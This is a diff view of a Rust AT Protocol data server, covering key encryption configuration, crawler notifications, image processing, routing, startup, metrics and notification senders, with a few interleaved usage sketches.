let point = verifying_key.to_encoded_point(false);
70
+
71
let signing_key_x = URL_SAFE_NO_PAD.encode(
72
point.x().expect("EC point missing X coordinate - this should never happen")
73
);
74
let signing_key_y = URL_SAFE_NO_PAD.encode(
75
point.y().expect("EC point missing Y coordinate - this should never happen")
76
);
77
+
78
let mut kid_hasher = Sha256::new();
79
kid_hasher.update(signing_key_x.as_bytes());
80
kid_hasher.update(signing_key_y.as_bytes());
81
let kid_hash = kid_hasher.finalize();
82
let signing_key_id = URL_SAFE_NO_PAD.encode(&kid_hash[..8]);
83
+
84
let master_key = std::env::var("MASTER_KEY").unwrap_or_else(|_| {
85
if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() {
86
"test-master-key-not-for-production".to_string()
···
91
);
92
}
93
});
94
+
95
if master_key.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
96
panic!("MASTER_KEY must be at least 32 characters");
97
}
98
+
99
let hk = Hkdf::<Sha256>::new(None, master_key.as_bytes());
100
let mut key_encryption_key = [0u8; 32];
101
hk.expand(b"bspds-user-key-encryption", &mut key_encryption_key)
102
.expect("HKDF expansion failed");
103
+
104
AuthConfig {
105
jwt_secret,
106
dpop_secret,
···
112
}
113
})
114
}
115
+
116
pub fn get() -> &'static Self {
117
CONFIG.get().expect("AuthConfig not initialized - call AuthConfig::init() first")
118
}
119
+
120
pub fn jwt_secret(&self) -> &str {
121
&self.jwt_secret
122
}
123
+
124
pub fn dpop_secret(&self) -> &str {
125
&self.dpop_secret
126
}
127
+
128
pub fn encrypt_user_key(&self, plaintext: &[u8]) -> Result<Vec<u8>, String> {
129
use rand::RngCore;
130
+
131
let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key)
132
.map_err(|e| format!("Failed to create cipher: {}", e))?;
133
+
134
let mut nonce_bytes = [0u8; 12];
135
rand::thread_rng().fill_bytes(&mut nonce_bytes);
136
+
137
#[allow(deprecated)]
138
let nonce = Nonce::from_slice(&nonce_bytes);
139
+
140
let ciphertext = cipher
141
.encrypt(nonce, plaintext)
142
.map_err(|e| format!("Encryption failed: {}", e))?;
143
+
144
let mut result = Vec::with_capacity(12 + ciphertext.len());
145
result.extend_from_slice(&nonce_bytes);
146
result.extend_from_slice(&ciphertext);
147
+
148
Ok(result)
149
}
150
+
151
pub fn decrypt_user_key(&self, encrypted: &[u8]) -> Result<Vec<u8>, String> {
152
if encrypted.len() < 12 {
153
return Err("Encrypted data too short".to_string());
154
}
155
+
156
let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key)
157
.map_err(|e| format!("Failed to create cipher: {}", e))?;
158
+
159
#[allow(deprecated)]
160
let nonce = Nonce::from_slice(&encrypted[..12]);
161
let ciphertext = &encrypted[12..];
162
+
163
cipher
164
.decrypt(nonce, ciphertext)
165
.map_err(|e| format!("Decryption failed: {}", e))
166
}
167
}
168
+
169
pub fn encrypt_key(plaintext: &[u8]) -> Result<Vec<u8>, String> {
170
AuthConfig::get().encrypt_user_key(plaintext)
171
}
172
+
173
pub fn decrypt_key(encrypted: &[u8], version: Option<i32>) -> Result<Vec<u8>, String> {
174
match version.unwrap_or(0) {
175
0 => Ok(encrypted.to_vec()),
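A minimal round-trip sketch of the nonce-prefixed AES-256-GCM envelope that encrypt_user_key/decrypt_user_key implement above (12 random nonce bytes followed by the ciphertext); the key, message, and function name are illustrative only.
use aes_gcm::{Aes256Gcm, Nonce, aead::{Aead, KeyInit}};
use rand::RngCore;

fn envelope_roundtrip(key: &[u8; 32], plaintext: &[u8]) -> Result<(), String> {
    let cipher = Aes256Gcm::new_from_slice(key).map_err(|e| e.to_string())?;

    // Encrypt side: fresh 12-byte nonce, wire format is nonce || ciphertext.
    let mut nonce_bytes = [0u8; 12];
    rand::thread_rng().fill_bytes(&mut nonce_bytes);
    let ciphertext = cipher
        .encrypt(Nonce::from_slice(&nonce_bytes), plaintext)
        .map_err(|e| e.to_string())?;
    let mut stored = Vec::with_capacity(12 + ciphertext.len());
    stored.extend_from_slice(&nonce_bytes);
    stored.extend_from_slice(&ciphertext);

    // Decrypt side mirrors decrypt_user_key: split the 12-byte prefix back off.
    let recovered = cipher
        .decrypt(Nonce::from_slice(&stored[..12]), &stored[12..])
        .map_err(|e| e.to_string())?;
    assert_eq!(recovered, plaintext);
    Ok(())
}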
+19
src/crawlers.rs
···
6
use std::time::Duration;
7
use tokio::sync::{broadcast, watch};
8
use tracing::{debug, error, info, warn};
9
+
10
const NOTIFY_THRESHOLD_SECS: u64 = 20 * 60;
11
+
12
pub struct Crawlers {
13
hostname: String,
14
crawler_urls: Vec<String>,
···
16
last_notified: AtomicU64,
17
circuit_breaker: Option<Arc<CircuitBreaker>>,
18
}
19
+
20
impl Crawlers {
21
pub fn new(hostname: String, crawler_urls: Vec<String>) -> Self {
22
Self {
···
30
circuit_breaker: None,
31
}
32
}
33
+
34
pub fn with_circuit_breaker(mut self, circuit_breaker: Arc<CircuitBreaker>) -> Self {
35
self.circuit_breaker = Some(circuit_breaker);
36
self
37
}
38
+
39
pub fn from_env() -> Option<Self> {
40
let hostname = std::env::var("PDS_HOSTNAME").ok()?;
41
+
42
let crawler_urls: Vec<String> = std::env::var("CRAWLERS")
43
.unwrap_or_default()
44
.split(',')
45
.filter(|s| !s.is_empty())
46
.map(|s| s.trim().to_string())
47
.collect();
48
+
49
if crawler_urls.is_empty() {
50
return None;
51
}
52
+
53
Some(Self::new(hostname, crawler_urls))
54
}
55
+
56
fn should_notify(&self) -> bool {
57
let now = std::time::SystemTime::now()
58
.duration_since(std::time::UNIX_EPOCH)
59
.unwrap_or_default()
60
.as_secs();
61
+
62
let last = self.last_notified.load(Ordering::Relaxed);
63
now - last >= NOTIFY_THRESHOLD_SECS
64
}
65
+
66
fn mark_notified(&self) {
67
let now = std::time::SystemTime::now()
68
.duration_since(std::time::UNIX_EPOCH)
69
.unwrap_or_default()
70
.as_secs();
71
+
72
self.last_notified.store(now, Ordering::Relaxed);
73
}
74
+
75
pub async fn notify_of_update(&self) {
76
if !self.should_notify() {
77
debug!("Skipping crawler notification due to debounce");
78
return;
79
}
80
+
81
if let Some(cb) = &self.circuit_breaker {
82
if !cb.can_execute().await {
83
debug!("Skipping crawler notification due to circuit breaker open");
84
return;
85
}
86
}
87
+
88
self.mark_notified();
89
let circuit_breaker = self.circuit_breaker.clone();
90
+
91
for crawler_url in &self.crawler_urls {
92
let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/'));
93
let hostname = self.hostname.clone();
94
let client = self.http_client.clone();
95
let cb = circuit_breaker.clone();
96
+
97
tokio::spawn(async move {
98
match client
99
.post(&url)
···
133
}
134
}
135
}
136
+
137
pub async fn start_crawlers_service(
138
crawlers: Arc<Crawlers>,
139
mut firehose_rx: broadcast::Receiver<SequencedEvent>,
···
145
crawlers = ?crawlers.crawler_urls,
146
"Starting crawlers notification service"
147
);
148
+
149
loop {
150
tokio::select! {
151
result = firehose_rx.recv() => {
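A small construction sketch for the notifier above; the module path, hostname, and relay URLs are assumptions for illustration, and from_env() builds the same thing from PDS_HOSTNAME plus a comma-separated CRAWLERS variable.
use std::sync::Arc;
use bspds::crawlers::Crawlers; // assumed path for src/crawlers.rs

fn example_crawlers() -> Arc<Crawlers> {
    Arc::new(Crawlers::new(
        "pds.example.com".to_string(),
        vec![
            // trailing slash is trimmed before "/xrpc/com.atproto.sync.requestCrawl" is appended
            "https://relay.example.org/".to_string(),
            "https://bsky.network".to_string(),
        ],
    ))
}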
+28
-1
src/image/mod.rs
···
1
use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType};
2
use std::io::Cursor;
3
pub const THUMB_SIZE_FEED: u32 = 200;
4
pub const THUMB_SIZE_FULL: u32 = 1000;
5
#[derive(Debug, Clone)]
6
pub struct ProcessedImage {
7
pub data: Vec<u8>,
···
9
pub width: u32,
10
pub height: u32,
11
}
12
#[derive(Debug, Clone)]
13
pub struct ImageProcessingResult {
14
pub original: ProcessedImage,
15
pub thumbnail_feed: Option<ProcessedImage>,
16
pub thumbnail_full: Option<ProcessedImage>,
17
}
18
#[derive(Debug, thiserror::Error)]
19
pub enum ImageError {
20
#[error("Failed to decode image: {0}")]
···
32
#[error("File too large: {size} bytes exceeds maximum {max_size} bytes")]
33
FileTooLarge { size: usize, max_size: usize },
34
}
35
-
pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024; // 10MB
36
pub struct ImageProcessor {
37
max_dimension: u32,
38
max_file_size: usize,
39
output_format: OutputFormat,
40
generate_thumbnails: bool,
41
}
42
#[derive(Debug, Clone, Copy)]
43
pub enum OutputFormat {
44
WebP,
···
46
Png,
47
Original,
48
}
49
impl Default for ImageProcessor {
50
fn default() -> Self {
51
Self {
···
56
}
57
}
58
}
59
impl ImageProcessor {
60
pub fn new() -> Self {
61
Self::default()
62
}
63
pub fn with_max_dimension(mut self, max: u32) -> Self {
64
self.max_dimension = max;
65
self
66
}
67
pub fn with_max_file_size(mut self, max: usize) -> Self {
68
self.max_file_size = max;
69
self
70
}
71
pub fn with_output_format(mut self, format: OutputFormat) -> Self {
72
self.output_format = format;
73
self
74
}
75
pub fn with_thumbnails(mut self, generate: bool) -> Self {
76
self.generate_thumbnails = generate;
77
self
78
}
79
pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> {
80
if data.len() > self.max_file_size {
81
return Err(ImageError::FileTooLarge {
···
109
thumbnail_full,
110
})
111
}
112
fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> {
113
match mime_type.to_lowercase().as_str() {
114
"image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg),
···
124
}
125
}
126
}
127
fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> {
128
let cursor = Cursor::new(data);
129
let reader = ImageReader::with_format(cursor, format);
···
131
.decode()
132
.map_err(|e| ImageError::DecodeError(e.to_string()))
133
}
134
fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> {
135
let (data, mime_type) = match self.output_format {
136
OutputFormat::WebP => {
···
165
height: img.height(),
166
})
167
}
168
fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> {
169
let (orig_width, orig_height) = (img.width(), img.height());
170
let (new_width, new_height) = if orig_width > orig_height {
···
177
let thumb = img.resize(new_width, new_height, FilterType::Lanczos3);
178
self.encode_image(&thumb)
179
}
180
pub fn is_supported_mime_type(mime_type: &str) -> bool {
181
matches!(
182
mime_type.to_lowercase().as_str(),
183
"image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp"
184
)
185
}
186
pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> {
187
let format = image::guess_format(data)
188
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
···
196
Ok(buf)
197
}
198
}
199
#[cfg(test)]
200
mod tests {
201
use super::*;
202
fn create_test_image(width: u32, height: u32) -> Vec<u8> {
203
let img = DynamicImage::new_rgb8(width, height);
204
let mut buf = Vec::new();
205
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
206
buf
207
}
208
#[test]
209
fn test_process_small_image() {
210
let processor = ImageProcessor::new();
···
213
assert!(result.thumbnail_feed.is_none());
214
assert!(result.thumbnail_full.is_none());
215
}
216
#[test]
217
fn test_process_large_image_generates_thumbnails() {
218
let processor = ImageProcessor::new();
···
227
assert!(full_thumb.width <= THUMB_SIZE_FULL);
228
assert!(full_thumb.height <= THUMB_SIZE_FULL);
229
}
230
#[test]
231
fn test_webp_conversion() {
232
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
···
234
let result = processor.process(&data, "image/png").unwrap();
235
assert_eq!(result.original.mime_type, "image/webp");
236
}
237
#[test]
238
fn test_reject_too_large() {
239
let processor = ImageProcessor::new().with_max_dimension(1000);
···
241
let result = processor.process(&data, "image/png");
242
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
243
}
244
#[test]
245
fn test_is_supported_mime_type() {
246
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
···
1
use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType};
2
use std::io::Cursor;
3
+
4
pub const THUMB_SIZE_FEED: u32 = 200;
5
pub const THUMB_SIZE_FULL: u32 = 1000;
6
+
7
#[derive(Debug, Clone)]
8
pub struct ProcessedImage {
9
pub data: Vec<u8>,
···
11
pub width: u32,
12
pub height: u32,
13
}
14
+
15
#[derive(Debug, Clone)]
16
pub struct ImageProcessingResult {
17
pub original: ProcessedImage,
18
pub thumbnail_feed: Option<ProcessedImage>,
19
pub thumbnail_full: Option<ProcessedImage>,
20
}
21
+
22
#[derive(Debug, thiserror::Error)]
23
pub enum ImageError {
24
#[error("Failed to decode image: {0}")]
···
36
#[error("File too large: {size} bytes exceeds maximum {max_size} bytes")]
37
FileTooLarge { size: usize, max_size: usize },
38
}
39
+
40
+
pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024;
41
+
42
pub struct ImageProcessor {
43
max_dimension: u32,
44
max_file_size: usize,
45
output_format: OutputFormat,
46
generate_thumbnails: bool,
47
}
48
+
49
#[derive(Debug, Clone, Copy)]
50
pub enum OutputFormat {
51
WebP,
···
53
Png,
54
Original,
55
}
56
+
57
impl Default for ImageProcessor {
58
fn default() -> Self {
59
Self {
···
64
}
65
}
66
}
67
+
68
impl ImageProcessor {
69
pub fn new() -> Self {
70
Self::default()
71
}
72
+
73
pub fn with_max_dimension(mut self, max: u32) -> Self {
74
self.max_dimension = max;
75
self
76
}
77
+
78
pub fn with_max_file_size(mut self, max: usize) -> Self {
79
self.max_file_size = max;
80
self
81
}
82
+
83
pub fn with_output_format(mut self, format: OutputFormat) -> Self {
84
self.output_format = format;
85
self
86
}
87
+
88
pub fn with_thumbnails(mut self, generate: bool) -> Self {
89
self.generate_thumbnails = generate;
90
self
91
}
92
+
93
pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> {
94
if data.len() > self.max_file_size {
95
return Err(ImageError::FileTooLarge {
···
123
thumbnail_full,
124
})
125
}
126
+
127
fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> {
128
match mime_type.to_lowercase().as_str() {
129
"image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg),
···
139
}
140
}
141
}
142
+
143
fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> {
144
let cursor = Cursor::new(data);
145
let reader = ImageReader::with_format(cursor, format);
···
147
.decode()
148
.map_err(|e| ImageError::DecodeError(e.to_string()))
149
}
150
+
151
fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> {
152
let (data, mime_type) = match self.output_format {
153
OutputFormat::WebP => {
···
182
height: img.height(),
183
})
184
}
185
+
186
fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> {
187
let (orig_width, orig_height) = (img.width(), img.height());
188
let (new_width, new_height) = if orig_width > orig_height {
···
195
let thumb = img.resize(new_width, new_height, FilterType::Lanczos3);
196
self.encode_image(&thumb)
197
}
198
+
199
pub fn is_supported_mime_type(mime_type: &str) -> bool {
200
matches!(
201
mime_type.to_lowercase().as_str(),
202
"image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp"
203
)
204
}
205
+
206
pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> {
207
let format = image::guess_format(data)
208
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
···
216
Ok(buf)
217
}
218
}
219
+
220
#[cfg(test)]
221
mod tests {
222
use super::*;
223
+
224
fn create_test_image(width: u32, height: u32) -> Vec<u8> {
225
let img = DynamicImage::new_rgb8(width, height);
226
let mut buf = Vec::new();
227
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
228
buf
229
}
230
+
231
#[test]
232
fn test_process_small_image() {
233
let processor = ImageProcessor::new();
···
236
assert!(result.thumbnail_feed.is_none());
237
assert!(result.thumbnail_full.is_none());
238
}
239
+
240
#[test]
241
fn test_process_large_image_generates_thumbnails() {
242
let processor = ImageProcessor::new();
···
251
assert!(full_thumb.width <= THUMB_SIZE_FULL);
252
assert!(full_thumb.height <= THUMB_SIZE_FULL);
253
}
254
+
255
#[test]
256
fn test_webp_conversion() {
257
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
···
259
let result = processor.process(&data, "image/png").unwrap();
260
assert_eq!(result.original.mime_type, "image/webp");
261
}
262
+
263
#[test]
264
fn test_reject_too_large() {
265
let processor = ImageProcessor::new().with_max_dimension(1000);
···
267
let result = processor.process(&data, "image/png");
268
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
269
}
270
+
271
#[test]
272
fn test_is_supported_mime_type() {
273
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
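A usage sketch for the builder API above, assuming the module is exposed as bspds::image; the limits and input MIME type are placeholder values.
use bspds::image::{ImageError, ImageProcessor, OutputFormat};

fn feed_thumbnail_webp(bytes: &[u8]) -> Result<Option<Vec<u8>>, ImageError> {
    let processor = ImageProcessor::new()
        .with_max_dimension(2048)
        .with_max_file_size(5 * 1024 * 1024)
        .with_output_format(OutputFormat::WebP)
        .with_thumbnails(true);
    // thumbnail_feed is only present when the source exceeds THUMB_SIZE_FEED.
    let result = processor.process(bytes, "image/png")?;
    Ok(result.thumbnail_feed.map(|t| t.data))
}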
+4
-1
src/lib.rs
···
16
pub mod sync;
17
pub mod util;
18
pub mod validation;
19
use axum::{
20
Router,
21
http::Method,
···
25
use state::AppState;
26
use tower_http::cors::{Any, CorsLayer};
27
use tower_http::services::{ServeDir, ServeFile};
28
pub fn app(state: AppState) -> Router {
29
let router = Router::new()
30
.route("/metrics", get(metrics::metrics_handler))
···
358
.route("/.well-known/did.json", get(api::identity::well_known_did))
359
.route("/.well-known/atproto-did", get(api::identity::well_known_atproto_did))
360
.route("/u/{handle}/did.json", get(api::identity::user_did_doc))
361
-
// OAuth 2.1 endpoints
362
.route(
363
"/.well-known/oauth-protected-resource",
364
get(oauth::endpoints::oauth_protected_resource),
···
402
.allow_headers(Any),
403
)
404
.with_state(state);
405
let frontend_dir = std::env::var("FRONTEND_DIR")
406
.unwrap_or_else(|_| "./frontend/dist".to_string());
407
if std::path::Path::new(&frontend_dir).join("index.html").exists() {
408
let index_path = format!("{}/index.html", frontend_dir);
409
let serve_dir = ServeDir::new(&frontend_dir)
···
16
pub mod sync;
17
pub mod util;
18
pub mod validation;
19
+
20
use axum::{
21
Router,
22
http::Method,
···
26
use state::AppState;
27
use tower_http::cors::{Any, CorsLayer};
28
use tower_http::services::{ServeDir, ServeFile};
29
+
30
pub fn app(state: AppState) -> Router {
31
let router = Router::new()
32
.route("/metrics", get(metrics::metrics_handler))
···
360
.route("/.well-known/did.json", get(api::identity::well_known_did))
361
.route("/.well-known/atproto-did", get(api::identity::well_known_atproto_did))
362
.route("/u/{handle}/did.json", get(api::identity::user_did_doc))
363
.route(
364
"/.well-known/oauth-protected-resource",
365
get(oauth::endpoints::oauth_protected_resource),
···
403
.allow_headers(Any),
404
)
405
.with_state(state);
406
+
407
let frontend_dir = std::env::var("FRONTEND_DIR")
408
.unwrap_or_else(|_| "./frontend/dist".to_string());
409
+
410
if std::path::Path::new(&frontend_dir).join("index.html").exists() {
411
let index_path = format!("{}/index.html", frontend_dir);
412
let serve_dir = ServeDir::new(&frontend_dir)
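The ServeDir wiring is cut off by the hunk above; a sketch of one common way to finish it (not necessarily what the hidden lines do) is to fall back to index.html so client-side routes resolve.
use axum::Router;
use tower_http::services::{ServeDir, ServeFile};

fn with_frontend(router: Router, frontend_dir: &str) -> Router {
    let index_path = format!("{}/index.html", frontend_dir);
    let serve_dir = ServeDir::new(frontend_dir).not_found_service(ServeFile::new(index_path));
    // Anything that misses an API route is handled by the static frontend.
    router.fallback_service(serve_dir)
}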
+30
src/main.rs
···
6
use std::sync::Arc;
7
use tokio::sync::watch;
8
use tracing::{error, info, warn};
9
+
10
#[tokio::main]
11
async fn main() -> ExitCode {
12
dotenvy::dotenv().ok();
13
tracing_subscriber::fmt::init();
14
bspds::metrics::init_metrics();
15
+
16
match run().await {
17
Ok(()) => ExitCode::SUCCESS,
18
Err(e) => {
···
21
}
22
}
23
}
24
+
25
async fn run() -> Result<(), Box<dyn std::error::Error>> {
26
let database_url = std::env::var("DATABASE_URL")
27
.map_err(|_| "DATABASE_URL environment variable must be set")?;
28
+
29
let max_connections: u32 = std::env::var("DATABASE_MAX_CONNECTIONS")
30
.ok()
31
.and_then(|v| v.parse().ok())
32
.unwrap_or(100);
33
+
34
let min_connections: u32 = std::env::var("DATABASE_MIN_CONNECTIONS")
35
.ok()
36
.and_then(|v| v.parse().ok())
37
.unwrap_or(10);
38
+
39
let acquire_timeout_secs: u64 = std::env::var("DATABASE_ACQUIRE_TIMEOUT_SECS")
40
.ok()
41
.and_then(|v| v.parse().ok())
42
.unwrap_or(10);
43
+
44
info!(
45
"Configuring database pool: max={}, min={}, acquire_timeout={}s",
46
max_connections, min_connections, acquire_timeout_secs
47
);
48
+
49
let pool = sqlx::postgres::PgPoolOptions::new()
50
.max_connections(max_connections)
51
.min_connections(min_connections)
···
55
.connect(&database_url)
56
.await
57
.map_err(|e| format!("Failed to connect to Postgres: {}", e))?;
58
+
59
sqlx::migrate!("./migrations")
60
.run(&pool)
61
.await
62
.map_err(|e| format!("Failed to run migrations: {}", e))?;
63
+
64
let state = AppState::new(pool.clone()).await;
65
bspds::sync::listener::start_sequencer_listener(state.clone()).await;
66
+
67
let (shutdown_tx, shutdown_rx) = watch::channel(false);
68
+
69
let mut notification_service = NotificationService::new(pool);
70
+
71
if let Some(email_sender) = EmailSender::from_env() {
72
info!("Email notifications enabled");
73
notification_service = notification_service.register_sender(email_sender);
74
} else {
75
warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)");
76
}
77
+
78
if let Some(discord_sender) = DiscordSender::from_env() {
79
info!("Discord notifications enabled");
80
notification_service = notification_service.register_sender(discord_sender);
81
}
82
+
83
if let Some(telegram_sender) = TelegramSender::from_env() {
84
info!("Telegram notifications enabled");
85
notification_service = notification_service.register_sender(telegram_sender);
86
}
87
+
88
if let Some(signal_sender) = SignalSender::from_env() {
89
info!("Signal notifications enabled");
90
notification_service = notification_service.register_sender(signal_sender);
91
}
92
+
93
let notification_handle = tokio::spawn(notification_service.run(shutdown_rx.clone()));
94
+
95
let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() {
96
let crawlers = Arc::new(
97
crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone())
···
103
warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)");
104
None
105
};
106
+
107
let app = bspds::app(state);
108
let addr = SocketAddr::from(([127, 0, 0, 1], 3000));
109
info!("listening on {}", addr);
110
+
111
let listener = tokio::net::TcpListener::bind(addr)
112
.await
113
.map_err(|e| format!("Failed to bind to {}: {}", addr, e))?;
114
+
115
let server_result = axum::serve(listener, app)
116
.with_graceful_shutdown(shutdown_signal(shutdown_tx))
117
.await;
118
+
119
notification_handle.await.ok();
120
+
121
if let Some(handle) = crawlers_handle {
122
handle.await.ok();
123
}
124
+
125
if let Err(e) = server_result {
126
return Err(format!("Server error: {}", e).into());
127
}
128
+
129
Ok(())
130
}
131
+
132
async fn shutdown_signal(shutdown_tx: watch::Sender<bool>) {
133
let ctrl_c = async {
134
match tokio::signal::ctrl_c().await {
···
138
}
139
}
140
};
141
+
142
#[cfg(unix)]
143
let terminate = async {
144
match tokio::signal::unix::signal(tokio::signal::unix::SignalKind::terminate()) {
···
151
}
152
}
153
};
154
+
155
#[cfg(not(unix))]
156
let terminate = std::future::pending::<()>();
157
+
158
tokio::select! {
159
_ = ctrl_c => {},
160
_ = terminate => {},
161
}
162
+
163
info!("Shutdown signal received, stopping services...");
164
shutdown_tx.send(true).ok();
165
}
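The pool settings above repeat the same parse-or-default dance; a hypothetical helper like this would express it once (name and values are illustrative, main.rs keeps it inline).
fn env_parse<T: std::str::FromStr>(name: &str, default: T) -> T {
    std::env::var(name).ok().and_then(|v| v.parse().ok()).unwrap_or(default)
}

// e.g. let max_connections: u32 = env_parse("DATABASE_MAX_CONNECTIONS", 100);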
+28
src/metrics.rs
···
8
use metrics_exporter_prometheus::{PrometheusBuilder, PrometheusHandle};
9
use std::sync::OnceLock;
10
use std::time::Instant;
11
+
12
static PROMETHEUS_HANDLE: OnceLock<PrometheusHandle> = OnceLock::new();
13
+
14
pub fn init_metrics() -> PrometheusHandle {
15
let builder = PrometheusBuilder::new();
16
let handle = builder
17
.install_recorder()
18
.expect("failed to install Prometheus recorder");
19
+
20
PROMETHEUS_HANDLE.set(handle.clone()).ok();
21
describe_metrics();
22
+
23
handle
24
}
25
+
26
fn describe_metrics() {
27
metrics::describe_counter!(
28
"bspds_http_requests_total",
···
73
"Database query duration in seconds"
74
);
75
}
76
+
77
pub async fn metrics_handler() -> impl IntoResponse {
78
match PROMETHEUS_HANDLE.get() {
79
Some(handle) => {
···
87
),
88
}
89
}
90
+
91
pub async fn metrics_middleware(request: Request<Body>, next: Next) -> Response {
92
let start = Instant::now();
93
let method = request.method().to_string();
94
let path = normalize_path(request.uri().path());
95
+
96
let response = next.run(request).await;
97
+
98
let duration = start.elapsed().as_secs_f64();
99
let status = response.status().as_u16().to_string();
100
+
101
counter!(
102
"bspds_http_requests_total",
103
"method" => method.clone(),
···
105
"status" => status.clone()
106
)
107
.increment(1);
108
+
109
histogram!(
110
"bspds_http_request_duration_seconds",
111
"method" => method,
112
"path" => path
113
)
114
.record(duration);
115
+
116
response
117
}
118
+
119
fn normalize_path(path: &str) -> String {
120
if path.starts_with("/xrpc/") {
121
if let Some(method) = path.strip_prefix("/xrpc/") {
···
125
return path.to_string();
126
}
127
}
128
+
129
if path.starts_with("/u/") && path.ends_with("/did.json") {
130
return "/u/{handle}/did.json".to_string();
131
}
132
+
133
if path.starts_with("/oauth/") {
134
return path.to_string();
135
}
136
+
137
path.to_string()
138
}
139
+
140
pub fn record_auth_cache_hit(cache_type: &str) {
141
counter!("bspds_auth_cache_hits_total", "cache_type" => cache_type.to_string()).increment(1);
142
}
143
+
144
pub fn record_auth_cache_miss(cache_type: &str) {
145
counter!("bspds_auth_cache_misses_total", "cache_type" => cache_type.to_string()).increment(1);
146
}
147
+
148
pub fn set_firehose_subscribers(count: usize) {
149
gauge!("bspds_firehose_subscribers").set(count as f64);
150
}
151
+
152
pub fn increment_firehose_subscribers() {
153
counter!("bspds_firehose_events_total").increment(1);
154
}
155
+
156
pub fn record_firehose_event() {
157
counter!("bspds_firehose_events_total").increment(1);
158
}
159
+
160
pub fn record_block_operation(op_type: &str) {
161
counter!("bspds_block_operations_total", "op_type" => op_type.to_string()).increment(1);
162
}
163
+
164
pub fn record_s3_operation(op_type: &str, status: &str) {
165
counter!(
166
"bspds_s3_operations_total",
···
169
)
170
.increment(1);
171
}
172
+
173
pub fn set_notification_queue_size(size: usize) {
174
gauge!("bspds_notification_queue_size").set(size as f64);
175
}
176
+
177
pub fn record_rate_limit_rejection(limiter: &str) {
178
counter!("bspds_rate_limit_rejections_total", "limiter" => limiter.to_string()).increment(1);
179
}
180
+
181
pub fn record_db_query(query_type: &str, duration_seconds: f64) {
182
counter!("bspds_db_queries_total", "query_type" => query_type.to_string()).increment(1);
183
histogram!(
···
186
)
187
.record(duration_seconds);
188
}
189
+
190
#[cfg(test)]
191
mod tests {
192
use super::*;
193
+
194
#[test]
195
fn test_normalize_path() {
196
assert_eq!(
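A wiring sketch for the request metrics above; the layer call is hypothetical, and the actual hook-up may sit in a hunk that is not shown here.
use axum::{middleware, Router};

fn with_request_metrics(router: Router) -> Router {
    // Records bspds_http_requests_total and the duration histogram per request.
    router.layer(middleware::from_fn(bspds::metrics::metrics_middleware))
}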
+3
src/notifications/mod.rs
···
1
mod sender;
2
mod service;
3
mod types;
4
+
5
pub use sender::{
6
DiscordSender, EmailSender, NotificationSender, SendError, SignalSender, TelegramSender,
7
is_valid_phone_number, sanitize_header_value,
8
};
9
+
10
pub use service::{
11
channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update,
12
enqueue_email_verification, enqueue_notification, enqueue_password_reset,
13
enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome, NotificationService,
14
};
15
+
16
pub use types::{
17
NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification,
18
};
+30
src/notifications/sender.rs
···
5
use std::time::Duration;
6
use tokio::io::AsyncWriteExt;
7
use tokio::process::Command;
8
+
9
use super::types::{NotificationChannel, QueuedNotification};
10
+
11
const HTTP_TIMEOUT_SECS: u64 = 30;
12
const MAX_RETRIES: u32 = 3;
13
const INITIAL_RETRY_DELAY_MS: u64 = 500;
14
+
15
#[async_trait]
16
pub trait NotificationSender: Send + Sync {
17
fn channel(&self) -> NotificationChannel;
18
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError>;
19
}
20
+
21
#[derive(Debug, thiserror::Error)]
22
pub enum SendError {
23
#[error("Failed to spawn sendmail process: {0}")]
···
35
#[error("Max retries exceeded: {0}")]
36
MaxRetriesExceeded(String),
37
}
38
+
39
fn create_http_client() -> Client {
40
Client::builder()
41
.timeout(Duration::from_secs(HTTP_TIMEOUT_SECS))
···
43
.build()
44
.unwrap_or_else(|_| Client::new())
45
}
46
+
47
fn is_retryable_status(status: reqwest::StatusCode) -> bool {
48
status.is_server_error() || status == reqwest::StatusCode::TOO_MANY_REQUESTS
49
}
50
+
51
async fn retry_delay(attempt: u32) {
52
